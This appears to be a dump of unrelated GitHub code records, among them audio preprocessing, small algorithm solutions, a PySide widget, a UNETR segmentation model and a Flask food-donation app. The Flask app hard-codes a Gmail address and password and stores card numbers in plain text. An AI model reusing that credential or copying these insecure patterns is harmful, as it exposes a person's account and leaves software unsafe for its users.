self.run_progress_proc(\n f0_extract_runner,\n files,\n (\n F0ExtractTask(\n f0_method=f0_method,\n crepe_model=crepe_model,\n hop_length=hop_length,\n f0_max=f0_max,\n f0_min=f0_min,\n f0_mel_max=f0_mel_max,\n f0_mel_min=f0_mel_min,\n ).dict(),\n ),\n max_workers,\n )\n\n def extract_features(\n self,\n encoder_path: str,\n hop_length: int = 160,\n encoder_output_layer: int = 12,\n device: Literal[\"cpu\", \"cuda\"] = \"cpu\",\n ):\n files = []\n for i, subset in enumerate(self.dataset.subsets):\n for file in subset.get_waves():\n files.append((i, file, subset.get_processed_dir()))\n\n self.run_progress_proc(\n feature_extract_runner,\n files,\n (\n FeatureExtractTask(\n hop_length=hop_length,\n encoder_path=encoder_path,\n encoder_output_layer=encoder_output_layer,\n device=device,\n subset_config=[subset.config for subset in self.dataset.subsets],\n ).dict(),\n ),\n 1,\n )\n\n def extract_volume(\n self,\n sampling_rate: int,\n hop_length: int = 160,\n max_workers: int = 1,\n ):\n files = []\n for subset in self.dataset.subsets:\n for file in subset.get_waves():\n files.append((file, subset.get_processed_dir()))\n\n self.run_progress_proc(\n extract_volume_runner,\n files,\n (\n VolumeExtractTask(\n sampling_rate=sampling_rate,\n hop_length=hop_length,\n ).dict(),\n ),\n max_workers,\n )\n\n def extract_mel(\n self,\n vocoder_path: str,\n sampling_rate: int,\n vocoder_type: Literal[\"nsf-hifigan\", \"nsf-hifigan-log10\"] = \"nsf-hifigan\",\n device: str = \"cpu\",\n max_workers: int = 1,\n ):\n files = []\n for subset in self.dataset.subsets:\n for file in subset.get_waves():\n files.append((file, subset.get_processed_dir()))\n\n self.run_progress_proc(\n extract_mel_spectrogram_runner,\n files,\n (\n MelExtractTask(\n vocoder_path=vocoder_path,\n sampling_rate=sampling_rate,\n vocoder_type=vocoder_type,\n device=device,\n ).dict(),\n ),\n max_workers,\n )\n","repo_name":"ddPn08/Latopia","sub_path":"latopia/dataset/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":15812,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"61"} +{"seq_id":"2841311336","text":"from napmo.system.elementary_particle import ElementaryParticle\nfrom napmo.gto.basis_set import BasisSet\n\n\ndef test_elementary_particle_interface():\n try:\n a = ElementaryParticle()\n assert False, 'Expecting Failure!'\n except TypeError:\n assert True\n\n a = ElementaryParticle('e-')\n assert a.get('name') == 'electron'\n assert a.get('symbol') == 'e-'\n assert a.get('charge') == -1.\n assert a.get('mass') == 1.\n\n try:\n print(a)\n except:\n raise\n\n try:\n a = ElementaryParticle('MM')\n assert False, 'Expecting Failure!'\n except KeyError:\n assert True\n\n# test_elementary_particle_interface()\n","repo_name":"efposadac/nAPMO","sub_path":"napmo/system/test/test_elementary_particle.py","file_name":"test_elementary_particle.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"5596043625","text":"\nimport os\nfrom collections import defaultdict\nimport pickle\nimport nltk\n\ncorpusdir = \"/Users/fathimakhazana/Documents/IRFinalProject/ParsedFiles/\"\n\ndef get_Tokens(filename):\n file_content = open(corpusdir + filename).read()\n tokens = nltk.word_tokenize(file_content)\n return tokens\n\nunigrams = defaultdict(list)\n\nfor filename in os.listdir(corpusdir):\n count = defaultdict(int)\n for word in get_Tokens(filename):\n count[word]+=1\n for word in count.keys():\n unigrams[word].append([filename,count[word]])\n \nwith open('unigrams.pickle','wb') as f:\n pickle.dump(unigrams,f)","repo_name":"khazana/SearchEngine","sub_path":"unigram_indexer.py","file_name":"unigram_indexer.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16944090944","text":"from typing import List\nimport sys\nsys.setrecursionlimit(100000)\n\ninput = sys.stdin.readline\n\ndef find_parent(parent: List[int], x: int) -> int:\n if parent[x] != x:\n parent[x] = find_parent(parent, parent[x])\n return parent[x]\n\ndef union_parent(parent: List[int], a: int, b: int):\n a = find_parent(parent, a)\n b = find_parent(parent, b)\n if a < b:\n parent[b] = a\n else:\n parent[a] = b\n\nn, m = map(int, input().split())\nparents = [0] * (n + 1)\nfor i in range(n + 1):\n parents[i] = i\nfor i in range(m):\n fc, a, b = map(int, input().split())\n if fc == 1:\n if find_parent(parents, a) == find_parent(parents, b):\n print(\"YES\")\n else:\n print(\"NO\")\n else:\n union_parent(parents, a, b)\n","repo_name":"Y-Joo/Baekjoon-Algorithm","sub_path":"pythonProject/UnionFind/UnionFind.py","file_name":"UnionFind.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71234787714","text":"\"\"\"Based on code by Dhruv Govil\"\"\"\n\nfrom PySide2 import QtWidgets, QtCore\nimport sys\n\n\nclass QCheckableList(QtWidgets.QWidget):\n \"\"\"\n Extends QWidget to create a clickable palette.\n A QCheckableList object is composed by a group and a QTreeWidget used as list of items, each with a checkbox.\n \"\"\"\n def __init__(self, title, items=()):\n super(QCheckableList, self).__init__()\n\n self.items = items\n\n layout = QtWidgets.QGridLayout(self)\n\n group = QtWidgets.QGroupBox(title)\n group_layout = QtWidgets.QVBoxLayout(group)\n layout.addWidget(group, 0, 0, 3, 3)\n\n tree = self.tree = QtWidgets.QTreeWidget()\n tree.setHeaderHidden(True)\n group_layout.addWidget(tree)\n\n for i in self.items:\n item = QtWidgets.QTreeWidgetItem()\n item.setText(0, i)\n item.setCheckState(0, QtCore.Qt.Unchecked)\n tree.addTopLevelItem(item)\n\n test_button = QtWidgets.QPushButton(\"Button\")\n test_button.clicked.connect(self.update_items)\n layout.addWidget(test_button, 3, 1)\n\n def get_selected_items(self):\n root = self.tree.invisibleRootItem()\n selected_items = []\n selected_items_texts = []\n for i in range(root.childCount()):\n item = root.child(i)\n if item.checkState(0):\n selected_items.append(item)\n selected_items_texts.append(item.text(0))\n\n return selected_items, selected_items_texts\n\n def update_items(self):\n root = self.tree.invisibleRootItem()\n for item in root.takeChildren():\n root.removeChild(item)\n\n for i in self.items:\n item = QtWidgets.QTreeWidgetItem()\n item.setText(0, i)\n item.setCheckState(0, QtCore.Qt.Unchecked)\n self.tree.addTopLevelItem(item)\n\n\nif __name__ == \"__main__\":\n app = QtWidgets.QApplication(sys.argv)\n\n items = (\"monitor\", \"mouse\", \"keyboard\", \"pippo\", \"pluto\", \"paperino\", \"topolino\", \"belin\", \"belan\")\n w = QCheckableList(\"prova\", items)\n w.show()\n\n sys.exit(app.exec_())\n\n","repo_name":"DanieleBerna/pyside2-kit","sub_path":"pyside2kit/list.py","file_name":"list.py","file_ext":"py","file_size_in_byte":2126,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"19716781614","text":"from flask import Flask, request, flash, url_for, redirect, render_template\r\nfrom flask_sqlalchemy import SQLAlchemy\r\nfrom flask_mail import Mail, Message\r\n\r\napp = Flask(__name__)\r\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///register.sqlite3'\r\napp.config['SECRET_KEY'] = \"random string\"\r\n\r\ndb = SQLAlchemy(app)\r\nmail=Mail(app)\r\n\r\napp.config.update(\r\n DEBUG=True,\r\n #EMAIL SETTINGS\r\n MAIL_SERVER='smtp.gmail.com',\r\n MAIL_PORT=465,\r\n MAIL_USE_SSL=True,\r\n MAIL_USERNAME = 'harjot.kaur.panag@gmail.com',\r\n MAIL_PASSWORD = 'SOKHAJEHA'\r\n )\r\n\r\nmail = Mail(app)\r\n\r\nclass register(db.Model):\r\n id = db.Column('register_id', db.Integer, primary_key = True)\r\n first = db.Column(db.String(100))\r\n email = db.Column(db.String(200), unique=True)\r\n\r\ndef __init__(self,first,email):\r\n self.first=first\r\n self.email=email\r\n\r\nclass post(db.Model):\r\n id = db.Column('post_id', db.Integer, primary_key = True)\r\n fullname = db.Column(db.String(20))\r\n email = db.Column(db.String(20))\r\n phoneno = db.Column(db.String(20))\r\n itemname= db.Column(db.String(20))\r\n pickuptime = db.Column(db.String(20))\r\n address = db.Column(db.String(20))\r\n expire = db.Column(db.String(20))\r\n description = db.Column(db.String(500))\r\n\r\ndef __init__(self,fullname,email,phoneno,itemname,pickuptime,address,expire,description):\r\n self.fullname=fullname\r\n self.email=email\r\n self.phoneno=phoneno\r\n self.itemname=itemname\r\n self.pickuptime=pickuptime\r\n self.address=address\r\n self.expire=expire\r\n self.description=description\r\n\r\nclass donation(db.Model):\r\n id = db.Column('donation_id', db.Integer, primary_key = True)\r\n firstname = db.Column(db.String(20))\r\n lastname = db.Column(db.String(20))\r\n demail= db.Column(db.String(20))\r\n dphoneno = db.Column(db.String(20))\r\n daddress = db.Column(db.String(20))\r\n cardno = db.Column(db.String(20), unique=True)\r\n amount = db.Column(db.String(20))\r\n check = db.Column(db.String(50))\r\n\r\ndef __init__(self,firstname,lastname,demail,dphoneno,daddress,cardno,amount,check):\r\n self.firstname=firstname\r\n self.lastname=lastname\r\n self.demail=demail\r\n self.dphoneno=dphoneno\r\n self.daddress=daddress\r\n self.cardno=cardno\r\n self.amount=amount\r\n self.check=check\r\n\r\n\r\n@app.route('/')\r\ndef all_main():\r\n return render_template('index.html')\r\n\r\n@app.route('/show_all')\r\ndef show_all():\r\n return render_template('get.html', post=post.query.all())\r\n@app.route('/about')\r\ndef about():\r\n return render_template('about.html')\r\n# @app.route('/u')\r\n# def u():\r\n# result=donation.query.all()\r\n# return render_template('show_all.html',result=result)\r\n\r\n@app.route('/new', methods = ['GET', 'POST'])\r\ndef new():\r\n if request.method == 'POST':\r\n if not request.form['Name'] or not request.form['email'] :\r\n flash('Please enter all the fields', 'error')\r\n else:\r\n registers = register(first=request.form['Name'], email=request.form['email'])\r\n\r\n db.session.add(registers)\r\n db.session.commit()\r\n flash('Record was successfully added')\r\n # return redirect(url_for('all_main'))\r\n return render_template('register.html')\r\n\r\n@app.route('/dny', methods = ['GET', 'POST'])\r\ndef dny():\r\n if request.method == 'POST':\r\n if not request.form['Fname'] or not request.form['Lname'] or not request.form['Email'] or not request.form['Telephone'] or not request.form['Address'] or not request.form['CardNumber'] or not request.form['Amount'] or not request.form['check']:\r\n flash('Please enter all the fields', 'error')\r\n else:\r\n donations = donation(firstname=request.form['Fname'], lastname=request.form['Lname'], demail=request.form['Email'], dphoneno=request.form['Telephone'], daddress=request.form['Address'], cardno=request.form['CardNumber'], amount=request.form['Amount'], check=request.form['check'])\r\n\r\n db.session.add(donations)\r\n db.session.commit()\r\n flash('Record was successfully added')\r\n # return redirect(url_for('all_main'))\r\n return render_template('donation.html')\r\n\r\n\r\n@app.route('/postfood', methods = ['GET', 'POST'])\r\ndef postfood():\r\n if request.method == 'POST':\r\n if not request.form['name'] or not request.form['email'] or not request.form['Phoneno'] or not request.form['itemname'] or not request.form['PickUpTime'] or not request.form['Address'] or not request.form['Expire'] or not request.form['comments']:\r\n flash('Please enter all the fields', 'error')\r\n else:\r\n posts = post(fullname=request.form['name'], email=request.form['email'],\r\n phoneno=request.form['Phoneno'], itemname=request.form['itemname'], pickuptime=request.form['PickUpTime'], address=request.form['Address'], expire=request.form['Expire'], description=request.form['comments'])\r\n users=register.query.all()\r\n emails = []\r\n for em in users:\r\n emails.append(em.email)\r\n msg = Message(\r\n 'Hello',\r\n sender='harjot.kaur.panag@gmail.com',\r\n recipients=emails)\r\n msg.body = posts.address\r\n msg.body += posts.description\r\n mail.send(msg)\r\n\r\n db.session.add(posts)\r\n db.session.commit()\r\n flash('Record was successfully added')\r\n # return redirect(url_for('show_all'))\r\n return render_template('post.html')\r\n\r\nif __name__ == '__main__':\r\n db.create_all()\r\n app.run(debug = True)\r\n","repo_name":"sethibadhan/FoodToFeed","sub_path":"register.py","file_name":"register.py","file_ext":"py","file_size_in_byte":5462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33728693022","text":"import os\nimport json\n\nstudent = []\n\nfile = open(\"student.txt\", 'r').read().split(\"\\n\")\n\nif '' in file:\n file.remove('')\nelse:\n pass\n\nif len(file) == 0:\n pass\nelse:\n for i in range(len(file)):\n student.append(file[i])\n\nstring = \"\"\"\n\n1. New Student\n2. Mark a Student\n3. Print All\n4. Exit\n\n\"\"\"\n\nprint(string)\n\n\ndef NStudent(name):\n if len(student) == 0:\n open(\"student.txt\", 'a').write('{}'.format(name))\n else:\n open(\"student.txt\", 'a').write('\\n{}'.format(name))\n student.append(name)\n\ndef MStudent(name, mark):\n mark = int(mark)\n if name in student:\n with open(\"student.json\", \"r+\") as jsonFile:\n data = json.load(jsonFile)\n\n data[\"{}\".format(name)] = mark\n\n jsonFile.seek(0)\n json.dump(data, jsonFile)\n jsonFile.truncate()\n jsonFile.close()\n elif (name in student) == False:\n print(f\"The student `{name}` is not exist!\")\n else:\n print(\"Unknown Error.\")\n\ndef PStudent():\n if len(student) == 0:\n print(\"No student found!\")\n else:\n for i in range(len(student)):\n f = open('student.json', 'r')\n data = f.read()\n f.close()\n if student[i] in data:\n std = json.loads( data )[student[i]]\n print('{}:{}'.format(student[i], std))\n else:\n print(f'Student `{student[i]}` is not marked')\n\nwhile True:\n inp = int(input(\"Enter your choice: \"))\n\n if inp == 1:\n NStudent(input(\"Enter Student Name: \"))\n elif inp == 2:\n MStudent(name=input(\"Enter Student Name: \"), mark=input(\"Enter your Mark: \"))\n elif inp == 3:\n PStudent()\n elif inp == 4:\n exit()\n else:\n print(\"Your Choice is not valid\")\n","repo_name":"PC-baz/student","sub_path":"student.py","file_name":"student.py","file_ext":"py","file_size_in_byte":1794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36481025636","text":"import torch.nn as nn\nimport torch.nn.functional as F\nimport torch\nfrom models.networks_other import init_weights\nfrom models.mymod.utils import UNetConv3D, UNETRSkip\nimport numpy as np\n\n\n\nclass UNETR(nn.Module):\n\n def __init__(self, filters = [64, 128, 256, 512], d_model=768, input_shape= (512,512,512), patch_size=(16,16,16), skip_idx = [3,6,9,12], n_classes=2, in_channels=1, n_heads=8, bn = True, up_mode='deconv', n_layers=12):\n super(UNETR, self).__init__()\n print(\"UNETR\")\n\n self.in_channels = in_channels\n self.d_model = d_model\n self.n_heads = n_heads\n self.input_shape = input_shape\n self.patch_size = patch_size\n self.n_layers = n_layers\n self.filters = filters\n self.filters.reverse()\n self.skip_idx = skip_idx\n\n self.emb_size_reshape = [int(i/j) for i,j in zip(self.input_shape, self.patch_size)] + [np.prod(self.patch_size)]\n self.emb_size_flat = [np.prod(self.emb_size_reshape[:3]), self.emb_size_reshape[3]]\n print('self.emb_size_reshape', self.emb_size_reshape)\n print('self.emb_size_flat', self.emb_size_flat)\n # Encoders\n self.lin = nn.Linear(self.emb_size_reshape[3], self.d_model)\n self.ListTrans = []\n for i in range(self.n_layers):\n encoder_layer = nn.TransformerEncoderLayer(d_model=self.d_model, nhead=self.n_heads)\n self.ListTrans.append(nn.TransformerEncoder(encoder_layer, 1))\n self.TransModuleList = nn.ModuleList(self.ListTrans) \n\n # Skips\n self.skip0 = UNetConv3D(self.in_channels, self.filters[3], bn=bn)\n self.skip1 = UNETRSkip(self.d_model, self.filters[:3], bn=bn)\n self.skip2 = UNETRSkip(self.d_model, self.filters[:2], bn=bn)\n self.skip3 = UNETRSkip(self.d_model, self.filters[:1], bn=bn)\n\n\n # Upsamplers\n self.up_concat4 = nn.ConvTranspose3d(self.d_model, self.filters[0], 2, stride = 2)\n self.up_concat3 = nn.Sequential(*[UNetConv3D(self.filters[0]*2,self.filters[1], bn=bn), nn.ConvTranspose3d(self.filters[1], self.filters[1], (2,2,2), stride = (2,2,2))])\n self.up_concat2 = nn.Sequential(*[UNetConv3D(self.filters[1]*2,self.filters[2], bn=bn), nn.ConvTranspose3d(self.filters[2], self.filters[2], (2,2,2), stride = (2,2,2))])\n self.up_concat1 = nn.Sequential(*[UNetConv3D(self.filters[2]*2,self.filters[3], bn=bn), nn.ConvTranspose3d(self.filters[3], self.filters[3], (2,2,2), stride = (2,2,2))])\n\n # final conv (without any concat)\n self.final = nn.Sequential(*[UNetConv3D(self.filters[3]*2,n_classes, bn=bn), nn.Conv3d(n_classes, n_classes, kernel_size=1)])\n\n # initialise weights\n for m in self.modules():\n if isinstance(m, nn.ConvTranspose3d) or isinstance(m, nn.Conv3d) or isinstance(m, nn.TransformerEncoderLayer):\n init_weights(m, init_type='kaiming')\n\n\n def forward(self, X, mode=None):\n bs = X.shape[0]\n # X = X[:, None, ...]\n\n sk0 = self.skip0(X)\n\n \n \n sk123 = []\n emb_size_reshape = [bs] + self.emb_size_reshape\n emb_size_reshape_trans = emb_size_reshape[:4]+ [self.d_model]\n emb_size_flat = [bs] + self.emb_size_flat\n # Get patches, flat and project\n X = torch.reshape(X, emb_size_reshape)\n X = torch.reshape(X, emb_size_flat)\n X = self.lin(X)\n\n\n # Go through transformers and save reshaped skip\n for i in range(self.n_layers):\n X = self.ListTrans[i](X.permute(1,0,2))\n if i+1 in self.skip_idx:\n sk123.append(torch.reshape(X.permute(1,0,2), emb_size_reshape_trans).permute(0,4,1,2,3))\n\n # Decode\n X = self.up_concat4(sk123[3])\n X = self.up_concat3(torch.cat([self.skip3(sk123[2]), X],1))\n X = self.up_concat2(torch.cat([self.skip2(sk123[1]), X],1))\n X = self.up_concat1(torch.cat([self.skip1(sk123[0]), X],1))\n\n # Final\n X = self.final(torch.cat([sk0, X], 1))\n \n\n # print(X.shape)\n # exit(0)\n return X\n\n @staticmethod\n def apply_argmax_softmax(pred):\n log_p = F.softmax(pred, dim=1)\n\n return log_p\n\n\n\ndef convert_bytes(size):\n for x in ['bytes', 'KB', 'MB', 'GB', 'TB']:\n if size < 1024.0:\n return \"%3.2f %s\" % (size, x)\n size /= 1024.0\n\n return size\n\n","repo_name":"Myyyr/segmentation3D","sub_path":"models/mymod/UNETR.py","file_name":"UNETR.py","file_ext":"py","file_size_in_byte":4369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23556928831","text":"# QR 2017\nfrom itertools import zip_longest\nfrom sys import stdin, stdout, stderr\n\n\ndef solve(num):\n if int(num) < 10:\n return num\n ans = []\n\n highest = int(num[0])\n prev, idx = int(num[0]), 0\n for i, s in enumerate(num):\n s = int(s)\n if highest <= s:\n highest = max(highest, s)\n if s != prev:\n ans.extend([prev] * (i - idx))\n prev = s\n idx = i\n else:\n if highest != 1:\n ans.append(highest - 1)\n ans.extend([9] * (len(num) - idx - 1))\n return int(''.join(str(s) for s in ans))\n\n ans.extend([prev] * (len(num) - idx))\n return int(''.join(str(s) for s in ans))\n\n\nif __name__ == \"__main__\":\n cases = int(stdin.readline())\n for c in range(1, cases + 1):\n num = stdin.readline().split()[0]\n # print(num)\n ans = solve(num)\n stdout.write(\"Case #{0}: {1}\\n\".format(c, ans))\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_200/2882.py","file_name":"2882.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2984572665","text":"def sample_with_list():\n # przyklad z lista\n array = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]\n for x in array:\n print(x)\n\n\ndef sample_with_generator():\n # przykład z generatorem\n for x in range(10):\n print(x)\n\n\ndef generator_manual_iteration():\n range_generator = range(10).__iter__()\n print(range_generator.__next__())\n print(range_generator.__next__())\n print(next(range_generator))\n print(next(range_generator))\n # co się stanie gdy dojdziemy do końca?\n\n\ndef string_generator():\n yield 'Ala'\n yield 'ma'\n yield 'kota'\n\n\ndef string_generator_sample():\n gen = string_generator()\n print(gen.__next__())\n print(gen.__next__())\n print(gen.__next__())\n try:\n print(gen.__next__())\n except StopIteration:\n print('Exception occurred!')\n\n\nif __name__ == '__main__':\n # sample_with_list()\n # sample_with_generator()\n generator_manual_iteration()\n\n string_generator_sample()\n","repo_name":"Oleksandr015/Algorytmy","sub_path":"AISD/generators/sample.py","file_name":"sample.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27057108288","text":"from csv import DictWriter\nfrom datetime import datetime\nfrom itertools import chain\n\nfrom django.db import models\nfrom django.db.models.functions import Concat\nfrom django.http import StreamingHttpResponse\nfrom rest_framework import permissions\n\nfrom .expenses import ExpensesEndpoint\nfrom .ticket_exports import TicketExportsEndpoint, DummyBuffer\n\n\nclass ExpenseExportsEndpoint(ExpensesEndpoint):\n permission_classes = (permissions.IsAdminUser, )\n\n def list(self, request, *args, **kwargs):\n queryset = self.filter_queryset(self.get_queryset())\n\n ticket_url = \\\n TicketExportsEndpoint.TICKET_URI.format(self.request.get_host())\n\n cols = dict(\n Link=Concat(\n models.Value(ticket_url),\n models.F('ticket_id'),\n output_field=models.CharField()\n ),\n Date=models.F('created_at'),\n Status=models.F('ticket__status'),\n Amount=models.F('amount'),\n Currency=models.F('amount_currency'),\n Rating=models.F('rating'),\n Scope=models.F('scope'),\n RequesterCountry=models.F('ticket__requester__country'),\n OriginalCountry=models.F('ticket__country'),\n ExtraCountries=models.Func(\n models.F('ticket__countries'),\n models.Value(','),\n function='ARRAY_TO_STRING',\n output_field=models.CharField()\n )\n )\n\n writer = DictWriter(DummyBuffer(), fieldnames=cols.keys())\n header_with_rows = chain(\n [dict(zip(cols.keys(), cols.keys()))],\n queryset.values(**cols)\n )\n\n response = StreamingHttpResponse(\n streaming_content=(\n writer.writerow(row) for row in header_with_rows\n ),\n content_type='text/csv'\n )\n\n response['Content-Disposition'] = (\n 'attachment; filename=\"expenses-{}.csv\"'.format(\n datetime.utcnow().strftime('%x')))\n\n return response\n","repo_name":"occrp/id-backend","sub_path":"api_v3/views/expense_exports.py","file_name":"expense_exports.py","file_ext":"py","file_size_in_byte":2051,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"61"} +{"seq_id":"10251091247","text":"def printN(n,N):\n if n==1:\n xing=\"*\"\n elif n==2:\n xing=\"*\"\n else:\n xing=\"*\"*n\n print(\"{:^{}}\".format(xing,N))\ninputV=input()\ntotal=eval(inputV)\nfor x in range(1,eval(inputV)+1,2):\n printN(x,total)\n\n\n n = eval(input())\nfor i in range(1,n+1,2):\n print(\"{0:^{1}}\".format('*'*i, n))","repo_name":"dagangge/myPythonCode","sub_path":"3第三周天天向上的力量/星号三角形.py","file_name":"星号三角形.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39670561390","text":"from discord.ext import commands\nfrom random import choice\n\nclass names(commands.Cog):\n\n\tdef __init__(self, bot):\n\t\tself.bot = bot\n\t\twith open('names.txt', 'r') as s:\n\t\t\tself.names = s.readlines()\n\n\t@commands.command()\n\tasync def name(self, ctx):\n\t\tname = choice(self.names).rstrip('\\n')\n\t\tif name[-1] in tuple('aiou'):\n\t\t\tsityName = name + choice(tuple('bcfgjklmnprsvz')) + 'ity'\n\t\telif name[-1] == 'e':\n\t\t\tsityName = name[:-1] + 'ity'\n\t\telse:\n\t\t\tsityName = name + 'ity'\n\t\tawait ctx.send(sityName)\n\ndef setup(bot):\n\tbot.add_cog(names(bot))\n","repo_name":"yayapple/soup-bot","sub_path":"cogs/name.py","file_name":"name.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71093940993","text":"from AthenaConfiguration.ComponentAccumulator import ComponentAccumulator\nfrom AthenaConfiguration.ComponentFactory import CompFactory\n\nfrom IOVDbSvc.IOVDbSvcConfig import addFoldersSplitOnline\n\ndef ALFA_DetectorToolCfg(flags, name=\"ALFA_DetectorTool\", **kwargs):\n result = ComponentAccumulator()\n theALFA_DetectorTool = CompFactory.ALFA_DetectorTool(name=\"ALFA_DetectorTool\")\n theALFA_DetectorTool.MetrologyType=3\n theALFA_DetectorTool.B7L1U_MDGeometryType = 2\n theALFA_DetectorTool.B7L1U_ODGeometryType = 2\n theALFA_DetectorTool.B7L1L_MDGeometryType = 2\n theALFA_DetectorTool.B7L1L_ODGeometryType = 2\n theALFA_DetectorTool.A7L1U_MDGeometryType = 2\n theALFA_DetectorTool.A7L1U_ODGeometryType = 2\n theALFA_DetectorTool.A7L1L_MDGeometryType = 2\n theALFA_DetectorTool.A7L1L_ODGeometryType = 2\n theALFA_DetectorTool.A7R1U_MDGeometryType = 2\n theALFA_DetectorTool.A7R1U_ODGeometryType = 2\n theALFA_DetectorTool.A7R1L_MDGeometryType = 2\n theALFA_DetectorTool.A7R1L_ODGeometryType = 2\n theALFA_DetectorTool.B7R1U_MDGeometryType = 2\n theALFA_DetectorTool.B7R1U_ODGeometryType = 2\n theALFA_DetectorTool.B7R1L_MDGeometryType = 2\n theALFA_DetectorTool.B7R1L_ODGeometryType = 2\n result.merge(addFoldersSplitOnline(flags,'FWD','/FWD/Onl/ALFA/position_calibration','/FWD/ALFA/position_calibration'))\n result.setPrivateTools(theALFA_DetectorTool)\n return result\n\n\ndef ForDetGeometryCfg(flags):\n from AtlasGeoModel.GeoModelConfig import GeoModelCfg\n result = GeoModelCfg(flags)\n geoModelSvc=result.getPrimary()\n geoModelSvc.DetectorTools += [ CompFactory.ForDetEnvelopeTool() ]\n # LUCID\n if flags.Detector.GeometryLucid:\n geoModelSvc.DetectorTools += [ CompFactory.LUCID_DetectorTool() ]\n # ALFA\n if flags.Detector.GeometryALFA:\n geoModelSvc.DetectorTools += [ result.popToolsAndMerge(ALFA_DetectorToolCfg(flags)) ]\n # ForwardRegion\n if flags.Detector.GeometryFwdRegion:\n # ForwardRegionGeoModelFactory (created by\n # ForwardRegionGeoModelTool) has a PublicToolHandle to\n # IForwardRegionProperties. Outside of simulation jobs the\n # default version of the tool seems to be used.\n from AthenaConfiguration.Enums import ProductionStep\n if flags.Common.ProductionStep in [ProductionStep.Simulation, ProductionStep.FastChain]:\n from ForwardRegionProperties.ForwardRegionPropertiesConfig import ForwardRegionPropertiesCfg\n tool = result.popToolsAndMerge(ForwardRegionPropertiesCfg(flags))\n result.addPublicTool(tool)\n geoModelSvc.DetectorTools += [ CompFactory.ForwardRegionGeoModelTool() ]\n # ZDC\n if flags.Detector.GeometryZDC:\n geoModelSvc.DetectorTools += [ CompFactory.ZDC_DetTool() ]\n # AFP\n if flags.Detector.GeometryAFP:\n geoModelSvc.DetectorTools += [ CompFactory.AFP_GeoModelTool() ]\n return result\n","repo_name":"Yusuf-Manjra/athena","sub_path":"DetectorDescription/GeoModel/AtlasGeoModel/python/ForDetGeoModelConfig.py","file_name":"ForDetGeoModelConfig.py","file_ext":"py","file_size_in_byte":2911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1165355255","text":"import queue\n\nclass BinaryTreeNode:\n def __init__(self, data):\n self.data = data\n self.left = None\n self.right = None\n \n#Function for printing the detailed of Tree\ndef printTreeDetail(root):\n if root == None:\n return \n print(root.data, end = \" : \")\n if root.left != None:\n print(\"L\", root.left.data, end = \",\")\n if root.right != None:\n print(\"R\", root.right.data, end=\"\")\n print()\n printTreeDetail(root.left)\n printTreeDetail(root.right)\n\n#function for print the value under the k1 and k2\ndef printElementK1K2(root, k1, k2):\n if root == None:\n return \n elif root.data > k2:\n return printElementK1K2(root.left, k1, k2)\n elif root.data < k1:\n return printElementK1K2(root.right, k1, k2)\n else:\n print(root.data)\n printElementK1K2(root.left, k1, k2)\n printElementK1K2(root.right, k1, k2)\n\n#Function for the taking input levelwise\ndef levelWiseTreeInput():\n q = queue.Queue()\n print(\"Enter root:\")\n rootData = int(input())\n if rootData == -1:\n return None\n root = BinaryTreeNode(rootData)\n q.put(root)\n while (not(q.empty())):\n current_node = q.get()\n print(\"Enter left child of \", current_node.data)\n leftChildData = int(input())\n if leftChildData != -1:\n leftChild = BinaryTreeNode(leftChildData)\n current_node.left = leftChild\n q.put(leftChild)\n\n print(\"Enter right child of \", current_node.data)\n rightChildData = int(input())\n if rightChildData != -1:\n rightChild = BinaryTreeNode(rightChildData)\n current_node.right = rightChild\n q.put(rightChild)\n\n return root\n\n\nroot = levelWiseTreeInput()\nprintTreeDetail(root)\nprint(printElementK1K2(root, 5, 10))\n\n","repo_name":"Surendraprajapat18/Python_DSA","sub_path":"#39printElementk1k2.py","file_name":"#39printElementk1k2.py","file_ext":"py","file_size_in_byte":1827,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"} +{"seq_id":"71248173635","text":"def reverse(arr):\n for i in range(0, int(len(arr)/2)):\n count = len(arr)-1-i\n temp = arr[i]\n last = arr[count]\n arr[i] = last\n arr[count] = temp\n return arr\n \ndef reverse_improved(arr):\n for i in range(0, int(len(arr)/2)):\n count = len(arr)-1-i\n temp = arr[i]\n arr[i]= arr[count]\n arr[count] = temp\n return arr \n\n","repo_name":"Urus-Corsa/Data-Structures-Algorithms","sub_path":"Iteration/reverse_array.py","file_name":"reverse_array.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9721911693","text":"\"\"\"\nFile: direct_model_tf.py \n-------------------\nThis file contains the Tensorflow source code for the direct, generative \nlearning-based registration model as described in section 2.3. \n\"\"\" \n\nimport numpy as np\nimport tensorflow as tf\nfrom keras import backend as K\nfrom matplotlib import pyplot as plt 